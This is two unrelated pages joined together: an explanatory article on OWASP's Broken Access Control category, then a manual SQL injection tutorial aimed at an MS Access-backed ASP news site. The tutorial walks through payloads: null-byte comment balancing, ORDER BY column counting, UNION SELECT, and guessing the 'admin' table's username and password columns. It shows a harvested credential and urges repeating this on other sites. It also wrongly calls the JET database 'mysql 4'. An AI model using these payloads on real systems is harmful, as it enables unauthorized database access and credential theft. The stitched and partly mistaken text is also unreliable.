A01:2021 Broken Access Control: The Most Exploited Application Weakness

 In the latest OWASP Top 10:2021 list, Broken Access Control has surged to the number one position—up from fifth place in the previous version. This marks it as the most exploited and widespread vulnerability in modern web applications. According to OWASP’s global testing data, 94% of applications were found to have at least one instance of broken access control, with over 318,000 occurrences mapped across 34 Common Weakness Enumerations (CWEs)—more than any other category.

What Is Broken Access Control?

Access control defines who can access what within a system. When these controls fail, attackers can gain unauthorized privileges, view sensitive data, or even perform administrative actions that compromise the entire application.
Simply put, broken access control is when an application fails to properly restrict actions that users are not allowed to perform.

Common Examples in Real-World Applications

• Bypassing Role Restrictions: Changing a user role from “user” to “admin” through URL tampering or API manipulation.

• Insecure Direct Object References (IDOR): Accessing someone else’s account or files by altering a parameter value such as a user ID.

• CORS Misconfiguration: Allowing resources to be accessed from untrusted origins through weak cross-origin settings.

• JWT or Session Token Tampering: Modifying tokens or cookies to escalate privileges.

• Force Browsing: Manually visiting restricted paths such as /admin or /confidential/reports.

Even applications developed with strong authentication can fail if authorization checks are missing or inconsistently applied across modules.

Why It’s So Prevalent

Access control logic is often decentralized, implemented inconsistently by different developers, or handled on the client side where attackers can easily manipulate requests. Organizations underestimate how complex enforcing fine-grained permissions can be—especially in APIs and microservices.

How to Prevent Broken Access Control

• Deny by Default: Restrict every action unless explicitly allowed by access control rules.

• Centralize Enforcement: Implement a unified access control layer on the server side.

• Enforce Resource Ownership: Validate that users only access data they own.

• Secure Tokens: Use short-lived JWTs and revoke them following OAuth guidelines.

• Test Rigorously: Include functional access control checks in automated unit and integration tests.

• Monitor and Log: Detect repeated access control failures and alert administrators for investigation.

• Limit CORS Exposure: Allow only trusted origins for cross-origin resource sharing.

Example in Action

Imagine a banking web app where user account information is fetched via a parameter:

text
https://examplebank.com/account?acct=12345

If a malicious user changes the account number to another user’s ID, and the app doesn’t verify ownership, the attacker gains access to the victim’s data. This is a textbook case of Broken Access Control through parameter tampering.

Final Thoughts

Broken Access Control remains the most dangerous and commonly exploited vulnerability in 2021—and even in 2025, it continues to appear in bug bounties and penetration tests. It’s not just a coding mistake; it’s often a design-level flaw that gives attackers the keys to your system. By adopting a deny-by-default mindset and implementing robust, centralized authorization, developers can safeguard their applications from this critical threat.

MS-Access Injection - Tutorial - Penetration Testing | Bug Bounty Program

 In this Tutorial You Will learn How to inject into MS Access Database.

So we will start Our Injecting Manually. First we have to check if Our Target site is Vulnerable. So we

will use Regular Injecting Type and add Single Quote ' at the end of the Parameter.

and Execute the URL

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341'

Here we got The ERROR ! !

ERROR:

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'ID =341''.

/dettaglio-news.asp, line 91

So Our Target is Vulnerable. Before Starting Other Process first we have To balance

our query. We will use Different Comments for balancing Our Query.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Error !

ERROR:Syntax error (missing operator) in query expression 'ID =341--'.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Again Error !!

Now Let's Check the null-byte " ;% 00 "

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;% 00 Error Gone!!

so will continue our Injecting with using Null-Byte at the end of the Parameter.

Now we have to Count the Total number of Columns. So For This Purpose we will

use Normally ORDER BY command.

Let's Check Total Number of Columns:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 1;% 00

No Error. Page Loaded Normally !

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 5;% 00

Again No Error !

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 8;% 00

Again page Loaded Normally !

but at order by 9 we have got the ERROR !

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 9;% 00

ERROR:

Microsoft JET Database Engine error '80040e14'

The Microsoft Jet database engine does not recognize '9' as a valid field name or

expression.

/dettaglio-news.asp, line 91

So There are 8 Columns .

Now Let's Prepare our UNION BASED command.

After Executing The UNION BASED query We have Got ERROR:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;%

00

 

ERROR:

Microsoft JET Database Engine error '80004005'

Query input must contain at least one table or query.

/dettaglio-news.asp, line 91

Here Comes The Main part.As our columns count is correct.so it seems to be

Database is mysql 4.

Now we Have to Guess the Tables and Columns.So First we will Guess the Tables.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from Login;% 00

it gives us ERROR!

ERROR:

Microsoft JET Database Engine error '80040e37'

The Microsoft Jet database engine cannot find the input table or query 'login'. Make

sure it exists and that its name is spelled correctly.

/dettaglio-news.asp, line 91

it Mean this table is not Exist. Let’s Try another.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from tabladmin;% 00

Still The Same ERROR!!

But when we try Table ADMIN the Error is Gone.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from admin;% 00

At the Table ADMIN the Error is gone and we can see the Vulnerable Columns on

the Web Page .

You can see the 2,3,6 are the Vulnerable Columns.so now we have to Guess the

Columns. We will put our columns in these Vulnerable Columns.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,admin_id,4,5,6,7,8 from admin;% 00

It Gives us Error !

ERROR:

Microsoft JET Database Engine error '80040e10'

No value given for one or more required parameters.

/dettaglio-news.asp, line 91

it Mean ,this Column is not existing. Let's Try Another.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,login_id,4,5,6,7,8 from admin;% 00

Still The Same Error !

When we Put Username Column the Error is Gone.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,username,4,5,6,7,8 from admin;% 00

So it gives us Username:01775IO5

Now Let's Guess column of Admin Password.

And the Column Password is also existing there.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,password,4,5,6,7,8 from admin;% 00

it Gives us Password="bEx0Th6

So we will do the same for other sites to injecting into database.